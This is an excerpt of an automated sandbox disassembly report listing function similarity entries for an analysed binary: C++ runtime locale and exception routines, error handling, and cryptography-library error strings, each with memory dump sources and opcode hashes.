                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
                                      • String ID:
                                      • API String ID: 113178234-0
                                      APIs
                                      • __EH_prolog3.LIBCMT ref: 0092C3F0
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0092C3FA
                                        • Part of subcall function 008B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 008B2B1D
                                        • Part of subcall function 008B2B00: std::_Lockit::~_Lockit.LIBCPMT ref: 008B2B39
                                      • numpunct.LIBCPMT ref: 0092C434
                                      • std::_Facet_Register.LIBCPMT ref: 0092C44B
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0092C46B
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0092C489
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                       • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrownumpunct
                                      • String ID:
                                      • API String ID: 2509942033-0
                                      APIs
                                      • __EH_prolog3.LIBCMT ref: 0092C496
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0092C4A0
                                        • Part of subcall function 008B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 008B2B1D
                                        • Part of subcall function 008B2B00: std::_Lockit::~_Lockit.LIBCPMT ref: 008B2B39
                                      • numpunct.LIBCPMT ref: 0092C4DA
                                      • std::_Facet_Register.LIBCPMT ref: 0092C4F1
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0092C511
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0092C52F
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                       • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrownumpunct
                                      • String ID:
                                      • API String ID: 2509942033-0
                                      APIs
                                      • __EH_prolog3.LIBCMT ref: 00938DF9
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00938E03
                                        • Part of subcall function 008B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 008B2B1D
                                        • Part of subcall function 008B2B00: std::_Lockit::~_Lockit.LIBCPMT ref: 008B2B39
                                      • messages.LIBCPMT ref: 00938E3D
                                      • std::_Facet_Register.LIBCPMT ref: 00938E54
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00938E74
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00938E92
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                       • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmessages
                                      • String ID:
                                      • API String ID: 438560357-0
                                      APIs
                                      • __EH_prolog3.LIBCMT ref: 00938D53
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00938D5D
                                        • Part of subcall function 008B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 008B2B1D
                                        • Part of subcall function 008B2B00: std::_Lockit::~_Lockit.LIBCPMT ref: 008B2B39
                                      • collate.LIBCPMT ref: 00938D97
                                      • std::_Facet_Register.LIBCPMT ref: 00938DAE
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00938DCE
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00938DEC
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                       • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcollate
                                      • String ID:
                                      • API String ID: 2363045490-0
                                      • Opcode ID: 65f2474001a417308d885f7328b3e0bbf6e18573b6a727c22d2a558f8c1c88e2
                                      • Instruction ID: fae272f47b0c5c6a1e5f0f408fbc5249d3d2406bf8b8b56f3637998fb6cf88b6
                                      • Opcode Fuzzy Hash: 65f2474001a417308d885f7328b3e0bbf6e18573b6a727c22d2a558f8c1c88e2
                                      • Instruction Fuzzy Hash: 6811EC75800228ABCF00EFA4C856BEE77B4AF94320F240809F815A73E2CF309A40CB91
                                      APIs
                                      • __EH_prolog3.LIBCMT ref: 00938FEB
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00938FF5
                                        • Part of subcall function 008B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 008B2B1D
                                        • Part of subcall function 008B2B00: std::_Lockit::~_Lockit.LIBCPMT ref: 008B2B39
                                      • moneypunct.LIBCPMT ref: 0093902F
                                      • std::_Facet_Register.LIBCPMT ref: 00939046
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00939066
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00939084
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
                                      • String ID:
                                      • API String ID: 113178234-0
                                      • Opcode ID: 399aa3a883ca402449c3087715a881a16702857799e8c548c6e43212b2fabbff
                                      • Instruction ID: 824bbc8a6fad58525d258d586c7260deedb82ad4e1f85bb733206a81f104c6e1
                                      • Opcode Fuzzy Hash: 399aa3a883ca402449c3087715a881a16702857799e8c548c6e43212b2fabbff
                                      • Instruction Fuzzy Hash: 3C11A0759042249BCF05EFA4D856BEE77B9AF84320F240409F401A72E2CF749A44CB91
                                      APIs
                                      • __EH_prolog3.LIBCMT ref: 00939091
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0093909B
                                        • Part of subcall function 008B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 008B2B1D
                                        • Part of subcall function 008B2B00: std::_Lockit::~_Lockit.LIBCPMT ref: 008B2B39
                                      • moneypunct.LIBCPMT ref: 009390D5
                                      • std::_Facet_Register.LIBCPMT ref: 009390EC
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0093910C
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0093912A
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
                                      • String ID:
                                      • API String ID: 113178234-0
                                      • Opcode ID: 9d773016f9c6058e002c82ac2c70db038f709033d876bef2fafdf8aa8cb54773
                                      • Instruction ID: 7a6d2a1ef1007799ab5b7b112af54927d8afb3dcf058016b84cd07cd7ac7fccd
                                      • Opcode Fuzzy Hash: 9d773016f9c6058e002c82ac2c70db038f709033d876bef2fafdf8aa8cb54773
                                      • Instruction Fuzzy Hash: BC11A075908229ABCF04EBA4D856BEE77B4AF84720F24040AF415B73D1DF749E40CB91
                                      APIs
                                      • GetLastError.KERNEL32(000000FF,00000000,00961C08,00000000,00000000,?,009620EE,00000000,00000000,008EC60F,?,000000FF), ref: 00974B7D
                                      • _free.LIBCMT ref: 00974BB0
                                      • _free.LIBCMT ref: 00974BD8
                                      • SetLastError.KERNEL32(00000000,00000000,008EC60F,?,000000FF), ref: 00974BE5
                                      • SetLastError.KERNEL32(00000000,00000000,008EC60F,?,000000FF), ref: 00974BF1
                                      • _abort.LIBCMT ref: 00974BF7
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: ErrorLast$_free$_abort
                                      • String ID:
                                      • API String ID: 3160817290-0
                                      • Opcode ID: f26688bbd56bf28ba251851046a55bf8cabe61356d220188689abe926357e065
                                      • Instruction ID: 20648f1a1d99425f255142e9bcf64e71332d45612e1038a82d0500272c41414e
                                      • Opcode Fuzzy Hash: f26688bbd56bf28ba251851046a55bf8cabe61356d220188689abe926357e065
                                      • Instruction Fuzzy Hash: 75F02237588A80B7C60237396C1AF2F236E9BC1F60B25C526F81CE2292EF24CD01A121
                                      APIs
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 008F79FF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Exception@8Throw
                                      • String ID: exceeds the maximum of $: footer length $: header length $: message length
                                      • API String ID: 2005118841-976070898
                                      • Opcode ID: ce8dfe016ac6d9045ef30801f5608c27acb9eb052bc37b1a3c681fa00b6ca39e
                                      • Instruction ID: 8646635b829a0c573adddea75b661c0db23e1f6fd25aa002af6f7953dbea6d33
                                      • Opcode Fuzzy Hash: ce8dfe016ac6d9045ef30801f5608c27acb9eb052bc37b1a3c681fa00b6ca39e
                                      • Instruction Fuzzy Hash: AFA14B75A0028CEFDB21DFA8CC45FEEBBACFF59304F144459E949E7241DA749A048BA1
                                      APIs
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 008FD208
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 008FD2C8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Exception@8Throw
                                      • String ID: AAD$AuthenticatedDecryptionFilter$AuthenticatedEncryptionFilter
                                      • API String ID: 2005118841-4071778396
                                      • Opcode ID: bfba120fbae27798cffb31eda38300e524193e8befac3b0d7dd4b9641a9d8682
                                      • Instruction ID: 704bee7dc709e9fee3bad81b206229339846d40200a8be21a2660f00c792e03a
                                      • Opcode Fuzzy Hash: bfba120fbae27798cffb31eda38300e524193e8befac3b0d7dd4b9641a9d8682
                                      • Instruction Fuzzy Hash: 94515E7190430DAFCB14DFA4DC41FAEBBB9FB58720F000529FA02A7691DB71A958DB91
                                      APIs
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 008FD004
                                        • Part of subcall function 00958621: RaiseException.KERNEL32(?,?,00925B8C,?,?,Dflt,?,?,?,?,?,00925B8C,?,009C9A70,?), ref: 00958681
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 008FD0B7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Exception@8Throw$ExceptionRaise
                                      • String ID: AAD$AuthenticatedDecryptionFilter$AuthenticatedEncryptionFilter
                                      • API String ID: 3476068407-4071778396
                                      • Opcode ID: aa13aa65e1c9702b2563d509c580278fe23a8ebdf35522a583cdef4f17b17270
                                      • Instruction ID: fa6a62df7c0acb7ddd80e762b74a01b90f429d219a239b2bcceb880f16d40352
                                      • Opcode Fuzzy Hash: aa13aa65e1c9702b2563d509c580278fe23a8ebdf35522a583cdef4f17b17270
                                      • Instruction Fuzzy Hash: B5418F71A0460CAFCB14DFA4C845FAEB7B8FB44724F504569F912A7781DB74BA08CB90
                                      APIs
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 008B6690
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 008B66EE
                                      • ___std_exception_copy.LIBVCRUNTIME ref: 008B6742
                                      Strings
                                      • CryptoMaterial: this object contains invalid values, xrefs: 008B6667
                                      • CryptoMaterial: this object does not support precomputation, xrefs: 008B66C5
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Exception@8Throw$___std_exception_copy
                                      • String ID: CryptoMaterial: this object contains invalid values$CryptoMaterial: this object does not support precomputation
                                      • API String ID: 4178755008-3364311089
                                      • Opcode ID: 09b8e60cd3fac046248f39f5ce851ecfbbf59c89706e3066ed2aa77de8ce6c8a
                                      • Instruction ID: caa68137cc8665c77ffc2966acedc40739d999b94fcdc68e937eb7db62e52171
                                      • Opcode Fuzzy Hash: 09b8e60cd3fac046248f39f5ce851ecfbbf59c89706e3066ed2aa77de8ce6c8a
                                      • Instruction Fuzzy Hash: D2414F71904608ABCB11DF95C841F9EB7FCFB45714F10866AE811E3790EB75AA18CB90
                                      APIs
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 008F4FFD
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 008F502B
                                      • ___std_exception_copy.LIBVCRUNTIME ref: 008F5082
                                      Strings
                                      • Cryptographic algorithms are disabled before the power-up self tests are performed., xrefs: 008F4FD4
                                      • Cryptographic algorithms are disabled after a power-up self test failed., xrefs: 008F5002
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Exception@8Throw$___std_exception_copy
                                      • String ID: Cryptographic algorithms are disabled after a power-up self test failed.$Cryptographic algorithms are disabled before the power-up self tests are performed.
                                      • API String ID: 4178755008-3345525433
                                      • Opcode ID: 62dd2b86fd258f8b5ac3ecb97a9dcc2f70feea3ffe2e4f58178830a6f629ec3e
                                      • Instruction ID: 2db636bdeb736a4b6b0485230909614352810418b9c31b785f076cc04cbecfd5
                                      • Opcode Fuzzy Hash: 62dd2b86fd258f8b5ac3ecb97a9dcc2f70feea3ffe2e4f58178830a6f629ec3e
                                      • Instruction Fuzzy Hash: 8F418071914608ABCB10EFA8C841BEEF7BCFF44714F00452AE911E3781EB74A608CB60
                                      APIs
                                        • Part of subcall function 009114E0: ___std_type_info_name.LIBVCRUNTIME ref: 0091159E
                                        • Part of subcall function 009114E0: ___std_type_info_name.LIBVCRUNTIME ref: 00911609
                                      • ___std_type_info_name.LIBVCRUNTIME ref: 00913261
                                        • Part of subcall function 009583D9: ___unDName.LIBVCRUNTIME ref: 00958405
                                      • ___std_type_info_name.LIBVCRUNTIME ref: 009132C7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: ___std_type_info_name$Name___un
                                      • String ID: Modulus$PublicExponent$ThisObject:
                                      • API String ID: 3683324773-1616987064
                                      • Opcode ID: 3a8be776ae2b1dc814e488b997423bfa13627a2638d256e099a702a96d7eb7fc
                                      • Instruction ID: bce8f1a4e918de9c607d440d9a76f82c762c4ee6b220154bc223a83aad3673ef
                                      • Opcode Fuzzy Hash: 3a8be776ae2b1dc814e488b997423bfa13627a2638d256e099a702a96d7eb7fc
                                      • Instruction Fuzzy Hash: 73412C307083456EC711AF34CC52B9BBBF5AFD5318F048A19F49467292EB72DA89C742
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Mpunct$GetcvtH_prolog3
                                      • String ID: $+xv
                                      • API String ID: 279835032-1686923651
                                      • Opcode ID: 545ff8dc2155cab6440d968ef0e188bac0e2246decfadeb973ca7500246dea23
                                      • Instruction ID: 2a63f1f28e4edcec09be54247f10636da24754d2937d63e38290171596ca98a2
                                      • Opcode Fuzzy Hash: 545ff8dc2155cab6440d968ef0e188bac0e2246decfadeb973ca7500246dea23
                                      • Instruction Fuzzy Hash: B621B0B1904B566ED725DF74849073BBEF8AB49300F044A1AF099C7A41E734EA01CF90
                                      APIs
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 008B376D
                                        • Part of subcall function 00958621: RaiseException.KERNEL32(?,?,00925B8C,?,?,Dflt,?,?,?,?,?,00925B8C,?,009C9A70,?), ref: 00958681
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 008B37B2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Exception@8Throw$ExceptionRaise
                                      • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                      • API String ID: 3476068407-1866435925
                                      • Opcode ID: 1eec4d3ebad971fd8ebbb4b927ceded89149ae206f0cd581b8112f198a671d9f
                                      • Instruction ID: 2ed866173d9e9eef4d9aa7ff50887748847fd0f7ba616ddf470b9595a62bd4c4
                                      • Opcode Fuzzy Hash: 1eec4d3ebad971fd8ebbb4b927ceded89149ae206f0cd581b8112f198a671d9f
                                      • Instruction Fuzzy Hash: 05F0F9F29057086BC720E95CC816BEB3388EB01350F084579FD65DA282EE35AA1587D6
                                      APIs
                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,009616BF,?,?,0096165F,?,009CCA70,0000000C,009617B6,?,00000002), ref: 0096172E
                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00961741
                                      • FreeLibrary.KERNEL32(00000000,?,?,?,009616BF,?,?,0096165F,?,009CCA70,0000000C,009617B6,?,00000002,00000000), ref: 00961764
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: AddressFreeHandleLibraryModuleProc
                                      • String ID: CorExitProcess$mscoree.dll
                                      • API String ID: 4061214504-1276376045
                                      • Opcode ID: def14f2890f4693ac13972d9ea21cccf9dbe891eaf92c902778277a5f2c86370
                                      • Instruction ID: 80738affe584d455c5238a16fd5e5aace94f63d45e65a65dadb50948475772f5
                                      • Opcode Fuzzy Hash: def14f2890f4693ac13972d9ea21cccf9dbe891eaf92c902778277a5f2c86370
                                      • Instruction Fuzzy Hash: 9DF0C230A14218BBCB009FA8DC49FAEBFB8EF44712F044169F806A2160CF709E40DB90
